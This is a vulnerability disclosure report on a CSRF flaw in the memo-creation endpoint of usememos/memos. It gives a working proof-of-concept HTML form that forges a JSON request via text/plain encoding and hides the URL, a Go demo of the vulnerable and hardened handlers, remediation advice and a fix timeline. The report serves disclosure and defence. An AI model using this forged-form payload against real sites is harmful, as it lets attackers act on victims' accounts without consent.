Cross Site Request Forgery in Create a Memo Functionality (POST /api/memo) in usememos/memos

Valid

Reported on

Dec 27th 2022


Description

I have discovered a CSRF vulnerability in Memos, in the Create a Memo functionality (POST /api/memo).

I have identified that it is possible to manipulate the actions of authenticated users by tricking them into clicking on a malicious link or visiting a malicious website while they are logged into Memos. This can allow an attacker to perform actions on behalf of the victim, such as creating or modifying memos.

To reproduce the vulnerability, I followed these steps:

  1. I logged into the Memos application with a valid account.
  2. I created a malicious HTML file containing a form that submits a request to the Memos application to create a new memo, with the content and visibility set to predetermined values:
<html>
  <body>
  <!-- Rewrite the address bar so the victim does not see the PoC path -->
  <script>history.pushState('', '', '/')</script>
    <!-- enctype="text/plain" keeps this a "simple" request: no CORS preflight,
         and the browser attaches the victim's Memos session cookie.
         The JSON body is carried in the field name; with text/plain the browser
         sends each field as name=value, so the server receives the JSON followed by "=" -->
    <form action="http://localhost:5230/api/memo" method="POST" enctype="text/plain">
      <input type="hidden" name="&#123;&quot;content&quot;&#58;&quot;CSRF&quot;&#44;&quot;visibility&quot;&#58;&quot;PRIVATE&quot;&#44;&quot;resourceIdList&quot;&#58;&#91;&#93;&#125;" value="" />
      <input type="submit" value="Submit request" />
    </form>
  </body>
</html>

  3. I hosted the malicious HTML file on a server and shared the link with a victim who was also logged into the Memos application.
  4. When the victim opened the link and the form was submitted, a new memo was created in their account with the predetermined content, without their knowledge or consent. (The PoC above uses a visible submit button; a one-line script calling document.forms[0].submit() would remove even that click.)

I have attached a proof-of-concept HTML file and a video demonstrating the vulnerability to this report.

The Cross-Site Request Forgery (CSRF) vulnerability occurs because the application does not require the Content-Type of the request to be application/json and accepts a text/plain body instead.

This matters because an HTML form can only send application/x-www-form-urlencoded, multipart/form-data or text/plain, all of which the browser treats as "simple" requests: they are sent cross-origin without a CORS preflight and with the victim's session cookie attached. By accepting text/plain, the endpoint lets a form on an attacker's page deliver a JSON body (the JSON placed in the field name, followed by the "=" the text/plain encoding appends) that is then parsed and acted on as if the victim had submitted it.

Proof of Concept

https://drive.google.com/file/d/10eIE2pXRcVDT1juyGu5_MSmvzgTmj_35/view?usp=sharing

Remediation

I recommend the following steps to mitigate this vulnerability. Implement proper CSRF protection, such as including a unique, per-session token in every state-changing request and verifying it on the server side (or, at minimum, marking the session cookie SameSite=Lax or Strict). In addition, validate the Content-Type of requests to ensure they are of the expected type, application/json, and reject anything else with 415 Unsupported Media Type. Because a form cannot send application/json and a cross-origin script that sets it triggers a CORS preflight, this check alone stops the form-based attack above; it should be applied to every state-changing endpoint, not only POST /api/memo, and treated as defence in depth rather than a substitute for token or SameSite protection.
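The mechanism described in the Description (a text/plain form body accepted as JSON) and the Content-Type check recommended here, as an added Go example that is not part of this report or of the memos code base. The JSON field names are taken from the PoC body; the struct, the in-memory store, the handler names and the "session" cookie are assumptions made for the demonstration.

```go
package main

import (
	"encoding/json"
	"fmt"
	"io"
	"mime"
	"net/http"
	"net/http/httptest"
	"strings"
)

// memoCreate mirrors the JSON the PoC sends to POST /api/memo.
// Field names come from the PoC; the struct itself is an assumption.
type memoCreate struct {
	Content        string `json:"content"`
	Visibility     string `json:"visibility"`
	ResourceIDList []int  `json:"resourceIdList"`
}

// store stands in for the database: a slice of created memos (assumed, for the demo).
type store struct{ memos []memoCreate }

// vulnerableCreate decodes the body as JSON regardless of Content-Type.
// json.Decoder.Decode reads exactly one JSON value and leaves the rest
// unread, so the trailing "=" a text/plain form appends is never seen.
func (s *store) vulnerableCreate(w http.ResponseWriter, r *http.Request) {
	var m memoCreate
	if err := json.NewDecoder(r.Body).Decode(&m); err != nil {
		http.Error(w, err.Error(), http.StatusBadRequest)
		return
	}
	s.memos = append(s.memos, m)
	w.WriteHeader(http.StatusCreated)
}

// requireJSON rejects every state-changing request whose Content-Type is not
// application/json. A form cannot produce that header, and a cross-origin
// fetch that sets it triggers a CORS preflight instead of a silent send.
func requireJSON(next http.Handler) http.Handler {
	return http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		switch r.Method {
		case http.MethodGet, http.MethodHead, http.MethodOptions:
		default:
			// ParseMediaType strips parameters such as "; charset=utf-8".
			mt, _, err := mime.ParseMediaType(r.Header.Get("Content-Type"))
			if err != nil || mt != "application/json" {
				http.Error(w, "unsupported media type", http.StatusUnsupportedMediaType)
				return
			}
		}
		next.ServeHTTP(w, r)
	})
}

// hardenedCreate also refuses unknown fields and anything after the JSON
// object, so a "name=value" form body fails even if the header check is bypassed.
func (s *store) hardenedCreate(w http.ResponseWriter, r *http.Request) {
	dec := json.NewDecoder(io.LimitReader(r.Body, 1<<20))
	dec.DisallowUnknownFields()
	var m memoCreate
	if err := dec.Decode(&m); err != nil {
		http.Error(w, err.Error(), http.StatusBadRequest)
		return
	}
	if _, err := dec.Token(); err != io.EOF {
		http.Error(w, "trailing data after JSON body", http.StatusBadRequest)
		return
	}
	s.memos = append(s.memos, m)
	w.WriteHeader(http.StatusCreated)
}

// forgedBody is what a browser sends for the PoC form: with enctype="text/plain"
// each field becomes "name=value\r\n", and the JSON sits in the name with an empty value.
const forgedBody = "{\"content\":\"CSRF\",\"visibility\":\"PRIVATE\",\"resourceIdList\":[]}=\r\n"

// post delivers body to h as the victim's browser would (cookie attached) and returns the status.
func post(h http.Handler, contentType, body string) int {
	req := httptest.NewRequest(http.MethodPost, "/api/memo", strings.NewReader(body))
	req.Header.Set("Content-Type", contentType)
	req.AddCookie(&http.Cookie{Name: "session", Value: "victim"}) // assumed cookie name
	rec := httptest.NewRecorder()
	h.ServeHTTP(rec, req)
	return rec.Code
}

func main() {
	vuln := &store{}
	fmt.Println("vulnerable, forged text/plain:", post(http.HandlerFunc(vuln.vulnerableCreate), "text/plain", forgedBody), "memos:", len(vuln.memos))
	hard := &store{}
	h := requireJSON(http.HandlerFunc(hard.hardenedCreate))
	fmt.Println("hardened, forged text/plain:", post(h, "text/plain", forgedBody), "memos:", len(hard.memos))
	fmt.Println("hardened, real JSON client:", post(h, "application/json; charset=utf-8", `{"content":"hello","visibility":"PRIVATE","resourceIdList":[]}`), "memos:", len(hard.memos))
}
```

Run it with `go run .`: the vulnerable handler returns 201 for the forged body and stores a memo with content "CSRF", the hardened chain returns 415 for the same body and 201 for a genuine application/json request. The trailing-data check in hardenedCreate is the second layer: it rejects the forged body with 400 even when called without requireJSON.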

Impact

A Cross-Site Request Forgery (CSRF) vulnerability can have significant impact on the security and integrity of an application.

If exploited, a CSRF vulnerability can allow an attacker to perform actions on behalf of an authenticated user, without their knowledge or consent. The attacker cannot read the responses, so the damage is the state change itself: modification or deletion of data, exposure of sensitive information (for example by changing the visibility of a memo), and other malicious actions.

In addition to the direct impact on users, a CSRF vulnerability can also damage the reputation and trust of the affected application and its owner. Users may lose confidence in the security of the application and may be less likely to use it, leading to potential financial losses for the business.

It is important for organizations to take steps to prevent and mitigate CSRF vulnerabilities in their applications, in order to protect their users and maintain the trust and integrity of their systems.

Timeline

The report was received and the usememos/memos team was contacted.
Alan Brian modified the report.
A member of the usememos/memos team was contacted.
STEVEN validated this vulnerability.
Alan Brian was awarded the disclosure bounty.
STEVEN marked this as fixed in 0.9.1 with commit c9bb2b.
STEVEN was awarded the fix bounty.
This vulnerability has been assigned a CVE.
STEVEN published this vulnerability.